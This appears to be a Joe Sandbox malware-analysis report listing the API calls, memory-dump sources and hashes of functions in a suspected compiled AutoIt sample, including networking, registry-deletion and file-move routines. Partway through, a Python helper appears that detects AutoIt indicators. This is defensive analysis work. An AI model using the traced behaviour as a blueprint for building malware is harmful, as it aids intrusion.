• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 8aebb1d284629be55d1d07059fc5ec70f62ff047d38c52817d4db45a840e3c00
• Instruction ID: 744af9bbf1fdad0ce3cc1db8f3830bb6a17ed350fd9e2092a03abf250a2b51d3
• Opcode Fuzzy Hash: 8aebb1d284629be55d1d07059fc5ec70f62ff047d38c52817d4db45a840e3c00
• Instruction Fuzzy Hash: 4151F3A15466E57DFB3683249C45BBABFA97F07300F089889F1D4468C3C395ACC8E760
APIs
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: _wcsncpy$LocalTime
• String ID:
• API String ID: 2945705084-0
• Opcode ID: 205388d5050489334587aeb0a27a3b347ee8d901127bb24ff1f0b195abd08f24
• Instruction ID: 8b7403fe8cda6cc3e6cc7860b066e911357a9c42d66eff2d8201dfb3629befae
• Opcode Fuzzy Hash: 205388d5050489334587aeb0a27a3b347ee8d901127bb24ff1f0b195abd08f24
• Instruction Fuzzy Hash: 1B41D866C1025476CB11EFB69C4A9CFB7BCAF05311F50486BE504E3261FB38E245C7AA
                                                                                                                      APIs
                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0051D5D4
                                                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0051D60A
                                                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0051D61B
                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0051D69D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                      • String ID: ,,U$DllGetClassObject
                                                                                                                      • API String ID: 753597075-2547291679
                                                                                                                      • Opcode ID: 71dff340d265f52814678d51359f0a433e0f1beb61f12fedae9bc2c03071ec80
                                                                                                                      • Instruction ID: 8712470b46a200f8f32af623453befa9451ef63d78834cd626b0d738dde7f8ea
                                                                                                                      • Opcode Fuzzy Hash: 71dff340d265f52814678d51359f0a433e0f1beb61f12fedae9bc2c03071ec80
                                                                                                                      • Instruction Fuzzy Hash: 02418DB5600204EFEB05DF64C884ADABFB9FF44314F1581A9AC099F209D7B1D984DBB0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0052466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00523697,?), ref: 0052468B
                                                                                                                        • Part of subcall function 0052466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00523697,?), ref: 005246A4
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 005236B7
                                                                                                                      • _wcscmp.LIBCMT ref: 005236D3
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 005236EB
                                                                                                                      • _wcscat.LIBCMT ref: 00523733
                                                                                                                      • SHFileOperationW.SHELL32(?), ref: 0052379F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 1377345388-1173974218
                                                                                                                      • Opcode ID: 93c862996cbd97026f0e63c1b8c1a53c063ba5f850153d82bac7e264da6210f2
                                                                                                                      • Instruction ID: c2e1d75b55f11156c0612599132b599dd793dc3b41231bc4351c1a4c517793f4
                                                                                                                      • Opcode Fuzzy Hash: 93c862996cbd97026f0e63c1b8c1a53c063ba5f850153d82bac7e264da6210f2
                                                                                                                      • Instruction Fuzzy Hash: 31418071108355AEC756EF64D4459DF7BECBF8A384F10082EB48AC3291EB38D689CB56
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 005472AA
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00547351
                                                                                                                      • IsMenu.USER32(?), ref: 00547369
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005473B1
                                                                                                                      • DrawMenuBar.USER32 ref: 005473C4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 3866635326-4108050209
                                                                                                                      • Opcode ID: 27690dd02ac70d72b92dfd7696d7f30153531e3c4761cedf7769e38ac00c1035
                                                                                                                      • Instruction ID: 081d70320859c6fed598070680f4fee14b3e20d6e59d01f8af9f09b7e79d93e6
                                                                                                                      • Opcode Fuzzy Hash: 27690dd02ac70d72b92dfd7696d7f30153531e3c4761cedf7769e38ac00c1035
                                                                                                                      • Instruction Fuzzy Hash: 65412575A04208AFDB20DF64D884ADABBF8FB09318F249829FD05A7250D730AD54EF50
                                                                                                                      APIs
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00540FD4
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00540FFE
                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 005410B5
                                                                                                                        • Part of subcall function 00540FA5: RegCloseKey.ADVAPI32(?), ref: 0054101B
                                                                                                                        • Part of subcall function 00540FA5: FreeLibrary.KERNEL32(?), ref: 0054106D
                                                                                                                        • Part of subcall function 00540FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00541090
                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00541058
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 395352322-0
                                                                                                                      • Opcode ID: 6cec0d421dd408b37c2320328d459bf393b5bfb4e2117454695be79d72c2a2fa
                                                                                                                      • Instruction ID: 99386e1ecb2651e5a43f5d280b6d8428d78270c46e64b93c8a60a44a0f18cd32
                                                                                                                      • Opcode Fuzzy Hash: 6cec0d421dd408b37c2320328d459bf393b5bfb4e2117454695be79d72c2a2fa
                                                                                                                      • Instruction Fuzzy Hash: 86313A75901109BFDB149B94DC8DEFFBBBCFF19348F00016AE506A2141EA709E899BA4
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 005462EC
                                                                                                                      • GetWindowLongW.USER32(01085420,000000F0), ref: 0054631F
                                                                                                                      • GetWindowLongW.USER32(01085420,000000F0), ref: 00546354
                                                                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00546386
                                                                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 005463B0
                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 005463C1
                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 005463DB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LongWindow$MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2178440468-0
                                                                                                                      • Opcode ID: 3abac2d48a9b30c5e1c33420d5eb33acf692a800f30c21ec57015c139313274e
                                                                                                                      • Instruction ID: f2c4c6fcb477f293ef860eb773df4c25b893ddd989ae1634703ee532b48cce00
                                                                                                                      • Opcode Fuzzy Hash: 3abac2d48a9b30c5e1c33420d5eb33acf692a800f30c21ec57015c139313274e
                                                                                                                      • Instruction Fuzzy Hash: EA3107386441919FDB20CF18DC84F953BE1FB5A718F290565F9019F2B2CB71AC44EB52
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0051DB2E
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0051DB54
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0051DB57
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0051DB75
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0051DB7E
                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0051DBA3
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0051DBB1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3761583154-0
                                                                                                                      • Opcode ID: 1c14a73699b47213dce676520b3450eb287459e2f90ff4416a81529010d6292d
                                                                                                                      • Instruction ID: c540c415b443d74d85a6672a911cb37a1dd98db672c1ea364873fe69f2f80de0
                                                                                                                      • Opcode Fuzzy Hash: 1c14a73699b47213dce676520b3450eb287459e2f90ff4416a81529010d6292d
                                                                                                                      • Instruction Fuzzy Hash: 4A21DE36604209AFEF10DFA9DC88CFB77ACFB09364B018529F915CB260DA709C858B70
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00537D8B: inet_addr.WSOCK32(00000000), ref: 00537DB6
                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006), ref: 005361C6
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 005361D5
                                                                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0053620E
                                                                                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00536217
                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00536221
                                                                                                                      • closesocket.WSOCK32(00000000), ref: 0053624A
                                                                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00536263
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 910771015-0
                                                                                                                      • Opcode ID: bb92da04a18a1fcc058e4133e9a822d08c4e9788e8ec296a5642074edd1bb861
                                                                                                                      • Instruction ID: 2d9cfc10e8a494deb3cc3dce3c1b7e3f8f2bdd8ccb206c7246374e563db0d7b2
                                                                                                                      • Opcode Fuzzy Hash: bb92da04a18a1fcc058e4133e9a822d08c4e9788e8ec296a5642074edd1bb861
                                                                                                                      • Instruction Fuzzy Hash: F5318F79600118AFDF10AF24CC89FBE7BA9FB45714F05842DF905AB291DB74AC089BA1
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                      • API String ID: 1038674560-2734436370
                                                                                                                      • Opcode ID: 33e929fa14e821157348817d3cb5207b5f0661072448d60b57d7aa293650a89d
                                                                                                                      • Instruction ID: a5fde7db4277ca397ccfce936f693617345ae2cbad29c82818d16416cc99105a
                                                                                                                      • Opcode Fuzzy Hash: 33e929fa14e821157348817d3cb5207b5f0661072448d60b57d7aa293650a89d
                                                                                                                      • Instruction Fuzzy Hash: 0A21797220425166E321AA36AC03FEB7BD8FF5A705F20843FF84687091EB949DC1C398
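The String ID of the function above (#OnAutoItStartRegister, #notrayicon, #requireadmin, compared with the case-insensitive __wcsnicmp) is the AutoIt3 runtime recognising script directives, which is what makes this binary look like a compiled AutoIt script. The following triage helper is an added example, not code from the Joe Sandbox report or from the sample: it scans a byte blob for those directive names in both ANSI and UTF-16LE, case-insensitively as the runtime does, and for the AU3 script-resource marker. The marker bytes (AU3!EA06, older AU3!EA05) and the "likely AutoIt" threshold are assumptions and heuristics, not something the report states, and the input blob is constructed for the example.

```python
"""Triage helper: look for AutoIt-runtime indicators in a byte blob.

Added example, not part of the Joe Sandbox report or the sample's code.
Assumptions: compiled AutoIt v3 scripts carry the resource marker
b"AU3!EA06" (older builds b"AU3!EA05"); the directive names are the ones
listed in the report's String ID. Treat every hit as a heuristic.
"""
import re

AU3_MARKERS = (b"AU3!EA06", b"AU3!EA05")           # assumed markers
DIRECTIVES = ("#OnAutoItStartRegister", "#notrayicon", "#requireadmin")


def _directive_patterns():
    """Case-insensitive patterns for each directive, ANSI and UTF-16LE.

    The runtime compares with __wcsnicmp, i.e. case-insensitively on
    wide strings, so the scan is case-insensitive and checks both encodings.
    """
    pats = []
    for d in DIRECTIVES:
        ansi = re.compile(re.escape(d.encode("ascii")), re.IGNORECASE)
        wide = re.compile(re.escape(d.encode("utf-16-le")), re.IGNORECASE)
        pats.append((d, ansi, wide))
    return pats


def _all_offsets(data: bytes, needle: bytes) -> list:
    """Every offset at which `needle` occurs in `data`."""
    out, i = [], data.find(needle)
    while i != -1:
        out.append(i)
        i = data.find(needle, i + 1)
    return out


def scan_autoit_indicators(data: bytes) -> dict:
    """Return the AutoIt indicators found in `data`.

    Keys:
      markers       - list of (marker, offset) for AU3 resource markers
      directives    - directive name -> sorted offsets (either encoding)
      likely_autoit - True when a marker or at least two distinct
                      directives are present (heuristic threshold)
    """
    markers = [(m.decode("ascii"), off)
               for m in AU3_MARKERS for off in _all_offsets(data, m)]
    directives = {}
    for name, ansi, wide in _directive_patterns():
        offs = sorted({m.start() for m in ansi.finditer(data)} |
                      {m.start() for m in wide.finditer(data)})
        if offs:
            directives[name] = offs
    likely = bool(markers) or len(directives) >= 2
    return {"markers": markers, "directives": directives,
            "likely_autoit": likely}


# Constructed sample blob (not the report's sample): a fake MZ prefix, the
# directive names as UTF-16LE with mixed case, padding, then an AU3 marker.
SAMPLE = (
    b"MZ" + b"\x00" * 62
    + "#OnAutoItStartRegister\0#NoTrayIcon\0#RequireAdmin\0".encode("utf-16-le")
    + b"\x00" * 16
    + b"AU3!EA06"
    + b"\x00" * 8
)

if __name__ == "__main__":
    # Replace SAMPLE with open(path, "rb").read() to scan a real file.
    result = scan_autoit_indicators(SAMPLE)
    print("likely AutoIt:", result["likely_autoit"])
    for marker, off in result["markers"]:
        print(f"  marker {marker} at 0x{off:x}")
    for name, offs in result["directives"].items():
        print(f"  directive {name} at", ", ".join(f"0x{o:x}" for o in offs))
```

On a real sample the UTF-16LE directive table usually lives in the AutoIt interpreter stub itself, so its presence says the file is (or embeds) the AutoIt3 runtime; the AU3 marker is what points at an embedded compiled script. Both together are a triage signal, not a verdict.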
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0051DC09
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0051DC2F
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0051DC32
                                                                                                                      • SysAllocString.OLEAUT32 ref: 0051DC53
                                                                                                                      • SysFreeString.OLEAUT32 ref: 0051DC5C
                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0051DC76
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0051DC84
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3761583154-0
                                                                                                                      • Opcode ID: a7166664d8e9df617cdd347be1d611df6d9128f0570c94e4f288055bdea26fe5
                                                                                                                      • Instruction ID: f3d519a25a5d2dd4dc64d8759b698567992fc3524aca894c3617961f35007878
                                                                                                                      • Opcode Fuzzy Hash: a7166664d8e9df617cdd347be1d611df6d9128f0570c94e4f288055bdea26fe5
                                                                                                                      • Instruction Fuzzy Hash: 89216035604204AFAB109FACDC88DEB7BECFB19364B108525F915CB260DAB4DC85DBB4
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004C1D73
                                                                                                                        • Part of subcall function 004C1D35: GetStockObject.GDI32(00000011), ref: 004C1D87
                                                                                                                        • Part of subcall function 004C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 004C1D91
                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00547632
                                                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0054763F
                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0054764A
                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00547659
                                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00547665
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                                      • Opcode ID: 96b12b0949a7e928efe940ea44ae6f9efc9f857262d75b6b87c8b79de1cd1612
                                                                                                                      • Instruction ID: af46b6caa7203aeea4886be13dd2e591f4edef11366e3a2e574ec0340d67e556
                                                                                                                      • Opcode Fuzzy Hash: 96b12b0949a7e928efe940ea44ae6f9efc9f857262d75b6b87c8b79de1cd1612
                                                                                                                      • Instruction Fuzzy Hash: FC1181B1110119BEEF118F64CC85EE77F6DFF08798F014115BA08A2060CB729C21DBA4
                                                                                                                      APIs
                                                                                                                      • __init_pointers.LIBCMT ref: 004E9AE6
                                                                                                                        • Part of subcall function 004E3187: EncodePointer.KERNEL32(00000000), ref: 004E318A
                                                                                                                        • Part of subcall function 004E3187: __initp_misc_winsig.LIBCMT ref: 004E31A5
                                                                                                                        • Part of subcall function 004E3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004E9EA0
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004E9EB4
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004E9EC7
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004E9EDA
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004E9EED
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 004E9F00
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 004E9F13
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 004E9F26
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 004E9F39
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 004E9F4C
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 004E9F5F
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 004E9F72
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 004E9F85
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004E9F98
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004E9FAB
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004E9FBE
                                                                                                                      • __mtinitlocks.LIBCMT ref: 004E9AEB
                                                                                                                      • __mtterm.LIBCMT ref: 004E9AF4
                                                                                                                        • Part of subcall function 004E9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,004E9AF9,004E7CD0,0057A0B8,00000014), ref: 004E9C56
                                                                                                                        • Part of subcall function 004E9B5C: _free.LIBCMT ref: 004E9C5D
                                                                                                                        • Part of subcall function 004E9B5C: DeleteCriticalSection.KERNEL32(02X,?,?,004E9AF9,004E7CD0,0057A0B8,00000014), ref: 004E9C7F
                                                                                                                      • __calloc_crt.LIBCMT ref: 004E9B19
                                                                                                                      • __initptd.LIBCMT ref: 004E9B3B
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004E9B42
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
